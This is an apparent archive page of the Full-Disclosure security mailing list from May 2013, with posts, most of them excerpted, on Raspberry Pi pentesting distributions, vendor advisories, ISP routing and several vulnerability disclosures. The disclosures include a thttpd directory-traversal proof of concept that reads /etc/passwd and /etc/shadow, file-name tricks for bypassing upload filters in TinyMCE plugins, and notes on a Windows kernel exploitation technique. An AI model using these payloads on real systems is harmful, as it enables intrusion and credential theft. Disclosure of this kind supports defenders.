gmane.comp.security.full-disclosure

Pentesting Distributions or Projects forRaspberry Pi

Jay Turla — 2013-05-21T16:13:53

Hey there guys,

Do you know other projects, distributions, and installer kits for Raspberry
PI aside from the distributions and kits mentioned in this article:
http://resources.infosecinstitute.com/pentesting-distributions-and-installer-kits-for-your-raspberry-pi/
 ?

I am very much interested in trying out new projects :)

Also lately I have been addicted to RetroPie (
https://github.com/petrockblog/RetroPie-Setup) ahahhaha although it is not
related to security really but I just love emulating some cool and classic
games from SNES.

Regards,

Jay Turla
http://resources.infosecinstitute.com/author/jay-turla/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: Sony PS3 Firmware v4.31 - Code ExecutionVulnerability

Julius Kivimäki — 2013-05-21T15:29:34

So, wanna tell me what exactly is critical about you being able to inject
marquee tags into your savefile names?


2013/5/21 Vulnerability Lab <research< at >vulnerability-lab.com>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: exploitation ideas under memory pressure

You Got Pwned — 2013-05-21T18:09:27

Hey Tavis,

very interesting work! You're right: the list ist getting worse every year.
So keep going!!!


2013/5/20 Tavis Ormandy <taviso< at >cmpxchg8b.com>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: exploitation ideas under memory pressure

Brian Blankenship — 2013-05-22T03:00:40

In the good spirit of full disclosure, we would appreciate some exploit code.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[ MDVSA-2013:166 ] krb5

2013-05-21T16:34:00

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2013:166
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : krb5
 Date    : May 21, 2013
 Affected: Business Server 1.0, Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 A vulnerability has been discovered and corrected in krb5:
 
 The kpasswd service provided by kadmind was vulnerable to a UDP
 ping-pong attack (CVE-2002-2443).
 
 The updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2443
 https://bugzilla.redhat.com/show_bug.cgi?id=962531
 _______________________________________________________________________

 Updated Package

Re: exploitation ideas under memory pressure

sd — 2013-05-21T03:14:32

Interesting idea to create a thread and patch the list. Upon reading your first post, I immediately thought this wasn't going to be exploitable, you've proven me wrong. Any chance for a copy of the exploit code? I might port it to Metasploit.

sd

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

CVE-2013-3496. Local privilege escalation vulnerability in Infotecs products (ViPNet Client\Coordinator, SafeDisk, Personal Firewall)

Максим Чудаков — 2013-05-21T06:37:10

CVE-2013-3496. Local privilege escalation vulnerability in Infotecs
products (ViPNet Client\Coordinator, SafeDisk, Personal Firewall)

CVE reference:
CVE-2013-3496

Credit:
Maksim Chudakov (< at >MChudakov)
Andrey Kurtasanov(andreykurtasanov< at >gmail.com)

Severity:
Medium

Local\Remote:
Local

Vulnerability Class:
Privilege Escalation

Vendor URL:
http://www.infotecs.biz/

Affected OS:
Windows

Vulnerable systems:
ViPNet Client 3.2.10 (15632) and prior
ViPNet Coordinator 3.2.10 (15632) and prior
ViPNet SafeDisk 4.1 (0.5643) and prior
VipNet Personal Firewall 3.1 and prior
Possibly same issues in other Infotecs products and other versions

Overview:
A local privilege escalation vulnerability exists in the Infotecs
products (ViPNet Client, SafeDisk, Personal Firewall and possibly
other products), which could be exploited by an attacker to execute
commands on the affected machine under the context of the SYSTEM user
or user with local administrative privileges.

Technical Background:
The vulnerability exists because I

Sony PS3 Firmware v4.31 - Code ExecutionVulnerability

Vulnerability Lab — 2013-05-20T23:32:57

Title:
======
Sony PS3 Firmware v4.31 - Code Execution Vulnerability


Date:
=====
2013-05-12


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=767


VL-ID:
=====
767


Common Vulnerability Scoring System:
====================================
6.5


Introduction:
=============
The PlayStation 3 is the third home video game console produced by Sony Computer Entertainment and the successor to the 
PlayStation 2 as part of the PlayStation series. The PlayStation 3 competes with Microsoft`s Xbox 360 and Nintendo`s Wii 
as part of the seventh generation of video game consoles. It was first released on November 11, 2006, in Japan, with 
international markets following shortly thereafter.

Major features of the console include its unified online gaming service, the PlayStation Network, its multimedia capabilities, 
connectivity with the PlayStation Portable, and its use of the Blu-ray Disc as its primary storage medium.

(Copy of the Homepage: http://en.wikipedia.org/wiki/PlayStation_3 )

Trend Micro DirectPass 1.5.0.1060 (Cloud) Software - Multiple Software Vulnerabilities

Vulnerability Lab — 2013-05-20T23:29:19

Title:
======
Trend Micro DirectPass 1.5.0.1060 (Cloud) Software - Multiple Software Vulnerabilities


Date:
=====
2013-05-21


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=894

Article: http://www.vulnerability-lab.com/dev/?p=580

Trend Micro (Reference): http://esupport.trendmicro.com/solution/en-US/1096805.aspx
Trend Micro Solution ID: 1096805

Video: http://www.vulnerability-lab.com/get_content.php?id=951


VL-ID:
=====
894


Common Vulnerability Scoring System:
====================================
6.1


Introduction:
=============
Trend Micro™ DirectPass™ manages website passwords and login IDs in one secure location, so you only need to 
remember one password. Other features include: Keystroke encryption, secure password generation, automatic 
form-filling, confidential notes, and a secure browser.

Convenience - You can securely and easily manage passwords for numerous online accounts with just one 
password and automatically login to your websites with one click. Mo

Re: exploitation ideas under memory pressure

Tavis Ormandy — 2013-05-20T21:35:54

I guess I'm talking to myself, maybe this list is all about XSS now ;)

I'm quite proud of this list cycle trick, here's how to turn it into an
arbitrary write.

First, we create a watchdog thread that will patch the list atomically
when we're ready. This is needed because we can't exploit the bug while
HeavyAllocPool is failing, because of the early exit in pprFlattenRec:

.text:BFA122B8                 call newpathrec              ; EPATHOBJ::newpathrec(_PATHRECORD * *,ulong *,ulong)
.text:BFA122BD                 cmp     eax, 1               ; Check for failure
.text:BFA122C0                 jz      short continue
.text:BFA122C2                 xor     eax, eax             ; Exit early
.text:BFA122C4                 jmp     early_exit

So we create a list node like this:

PathRecord->Next    = PathRecord;
PathRecord->Flags   = 0;

Then EPATHOBJ::bFlatten() spins forever doing nothing:

BOOL __thiscall EPATHOBJ::bFlatten(EPATHOBJ *this)
{
    /* ... */

    for ( ppr = ppath->pprfirst; ppr; ppr = ppr->ppr

Re: My ISP is routing traffic to privateaddresses...

Patrick Webster — 2013-05-20T16:19:03

Maybe when we cut over to IPv6 the ISPs will revert to the golden age of
putting all their gear on publicly addressable space :)

Conversely, an enjoyable network design is where you route public IPs from
a private network to a private network, and the public IP has different
services on the internet to the internally routed version, but clients need
access to both.

NATing heaven.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Critical issues affecting multiple game engines

ReVuln — 2013-05-20T11:46:11

We have just released a paper [1], in which we detail several 0-day
issues affecting a number of different game engines, including: Unreal
Engine, CryEngine 3 and idTech 4.

During our presentation at the recent NoSuchCon conference in Paris, we
discussed [2] additional details about game engine issues. Additionally
we demonstrated [3] how an attacker can use master servers to perform
mass-exploiting of game vulnerabilities, in order to target and potentially
take down entire game networks.


[1] http://revuln.com/files/ReVuln_Game_Engines_0days_tale.pdf
[2] http://revuln.com/files/Ferrante_Auriemma_Exploiting_Game_Engines.pdf
[3] http://vimeo.com/66027238


---
ReVuln
http://revuln.com
http://twitter.com/revuln
http://revuln.com/revuln.asc


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: My ISP is routing traffic to privateaddresses...

Alexander Georgiev — 2013-05-20T10:00:53

Because private addresses have no global meaning, routing information
   about private networks shall not be propagated on inter-enterprise
   links, and packets with private source or destination addresses
   should not be forwarded across such links. Routers in networks not
   using private address space, especially those of Internet service
   providers, are expected to be configured to reject (filter out)
   routing information about private networks. If such a router receives
   such information the rejection shall not be treated as a routing
   protocol error.



Am 18. Mai 2013 14:55:08 schrieb Justin Elze <formulals1< at >gmail.com>:
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Defense in depth -- the Microsoft way

Stefan Kanthak — 2013-05-19T15:40:57

Hi < at >ll,

the "Microsoft Installer" creates for applications installed via an
.MSI the following uninstall information in the Windows registry
(see <http://msdn.microsoft.com/library/aa372105.aspx>):

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall]
"UninstallString"="MsiExec.Exe /X{<GUID>}"
"ModifyPath"="MsiExec.Exe /I{<GUID>}"

Note the unqualified path to the executable "msiexec.exe".

On Windows installations without the "SafeProcessSearchMode" hotfix
(cf. <http://support.microsoft.com/kb/905890>) or with this safeguard
turned off (cf. <http://msdn.microsoft.com/library/dd266735.aspx>,
which refers to <http://support.microsoft.com/kb/959426> alias MS09-015),
an executable "msiexec.exe" placed in the CWD or the users "base"
directory (addressed by "%HOMEDRIVE%%HOMEPATH%" and typically equal to
"%USERPROFILE%") can be run instead of the intended executable
"%SystemRoot%\System32\MsiExec.Exe".


The VERY simple fix (which eliminates this attack vector completely):
always use fully-qua

Thttpd 2.25b Directory Traversal Vulnerability

metropolis haxor — 2013-05-19T20:12:04

Hi guys,
You can find the software affected at http://www.acme.com/software/thttpd/thttpd-2.25b.tar.gz 
Thanks,
Metropolis
###########################################
#
# Software Name : Thttpd 2.25b
#
# Version :  2.25b (29dec2003)
#
# Bug Type : Directory Traversal Vulnerability
#
# Found by : Metropolis
#
# Home : http://metropolis.fr.cr
#
# Discovered : 19/05/2013
#
# Download app : http://www.acme.com/software/thttpd/thttpd-2.25b.tar.gz
#
#
###########################################
 
PoC :
 
127.0.0.1:80/../../../../../../../../etc/passwd


127.0.0.1:80/../../../../../../../../etc/shadow 
 

Example :
 
metropolis< at >Linuxbox ~ $ GET 127.0.0.1:80/../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin

Interesting referrer URLs when accessing vulnerability disclosure information

halfdog — 2013-05-19T21:46:30

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello list,

In the aftermath of most of my full-disclosure posts I've observed
quite interesting referrer URLs when someone tries to read information
provided explaining the issue. In quite some cases, those requests can
be attributed to national CERTs, software distributors' security
teams, universities with IT-security research units, ... accessing
that information.

Information leaked via the referrer URLs indicates, that a noticeable
number of security experts do not exercise strict separation of their
internal working processes, e.g. accessing their internal
wiki/mantis/communication/... systems, from the context used for
accessing POC data. In rare cases even session IDs are encoded in the URL.

A malicious attacker could use the disclosure of e.g. an unrelated
zero day to compromise especially machines of CERT/DoD/.. or get at
least hints, who is interested in his material, e.g. by requests like

[Some-IP] - - [14/May/2013:17:44:38 +0000] "GET
/Security/

Revision of "IPv6 Stable Privacy Addresses" (Fwd:I-D Action: draft-ietf-6man-stable-privacy-addresses-07.txt)

Fernando Gont — 2013-05-19T18:05:00

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Folks,

We have published a revision of our IETF I-D "A method for Generating
Stable Privacy-Enhanced Addresses with IPv6 Stateless Address
Autoconfiguration (SLAAC)".

This revision is available at:
<http://tools.ietf.org/html/draft-ietf-6man-stable-privacy-addresses-07>.

This proposal is key for the mitigation of address-scanning attacks,
while at the same time preventing host-tracking.

Stay tuned for more IPv6 security news on our Twitter account:
< at >SI6Networks

Thanks!

Best regards,
Fernando Gont




- -------- Original Message --------
Subject: I-D Action: draft-ietf-6man-stable-privacy-addresses-07.txt
Date: Sun, 19 May 2013 10:06:30 -0700
From: internet-drafts< at >ietf.org
To: i-d-announce< at >ietf.org
CC: ipv6< at >ietf.org


A New Internet-Draft is available from the on-line Internet-Drafts
directories.
 This draft is a work item of the IPv6 Maintenance Working Group of the
IETF.

Title           : A method for Generating Stable Privacy-Enhanced
Addresses with IP

AFU vulnerabilities in MCImageManager for TinyMCE

MustLive — 2013-05-19T18:00:01

Hello list!

I want to warn you about vulnerabilities in Moxiecode Image Manager 
(MCImageManager). This is commercial plugin for TinyMCE. It concerns as 
MCImageManager, as all web applications which have MCImageManager in their 
bundle.

These are Arbitrary File Uploading vulnerabilities, which lead to Code 
Execution on IIS and Apache web servers.

-------------------------
Affected products:
-------------------------

Vulnerable are Moxiecode Image Manager 3.1.5 and previous versions.

-------------------------
Affected vendors:
-------------------------

Moxiecode
http://www.moxiecode.com

----------
Details:
----------

Arbitrary File Uploading (WASC-31):

http://site/path/tiny_mce/plugins/imagemanager/pages/im/index.html

Execution of arbitrary code is possible due to bypass of program's security 
filters (on IIS and Apache web servers).

Code will execute via file uploading. Program is vulnerable to two methods 
of code execution:

1. Via using of symbol ";" (1.asp;.txt) in file name (IIS).

2. Via d

AFU vulnerabilities in MCFileManager for TinyMCE

MustLive — 2013-05-18T20:45:44

Hello list!

I want to warn you about vulnerabilities in Moxiecode File Manager 
(MCFileManager). This is commercial plugin for TinyMCE. It concerns as 
MCFileManager, as all web applications which have MCFileManager in their 
bundle.

These are Arbitrary File Uploading vulnerabilities, which lead to Code 
Execution on IIS and Apache web servers.

-------------------------
Affected products:
-------------------------

Vulnerable are Moxiecode File Manager 3.1.5 and previous versions.

-------------------------
Affected vendors:
-------------------------

Moxiecode
http://www.moxiecode.com

----------
Details:
----------

Arbitrary File Uploading (WASC-31):

Execution of arbitrary code is possible due to bypass of program's security 
filters (on IIS and Apache web servers).

Code will execute via file uploading. Program is vulnerable to three methods 
of code execution:

1. Via using of symbol ";" (1.asp;.txt) in file name (IIS).

2. Via "1.asp" in folder name (IIS).

3. Via double extension (1.php.txt) (Apac

Re: My ISP is routing traffic to privateaddresses...

Justin Elze — 2013-05-18T12:55:08

The idea behind private IP space is it doesn't leave the ISPs AS via BGP to
the rest of the internet.

On the topic of routing if you're router doesn't have a directly connected
route or specific route for 172.x.x.x/whatever it will automatically send
information to the default 0.0.0.0 route.

There could be a number of cases where you had private IP space in front of
a router/wap/whatever.

ISPs use prefix lists on their boarder BGP routers to explicitly allow
which ranges get redistributed to the rest of the internet.


On Sat, May 18, 2013 at 7:41 AM, Kirils Solovjovs <
kirils.solovjovs< at >kirils.com> wrote:

Re: My ISP is routing traffic to privateaddresses...

Dan Dart — 2013-05-18T12:39:23

Virgin at least use the 172.16.x.x internally to their infrastructure
- and they suggest you use 192.168.x.x for your personal use.
Traceroutes to any "external" address outside of their network go
through a 172.16.x.x

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/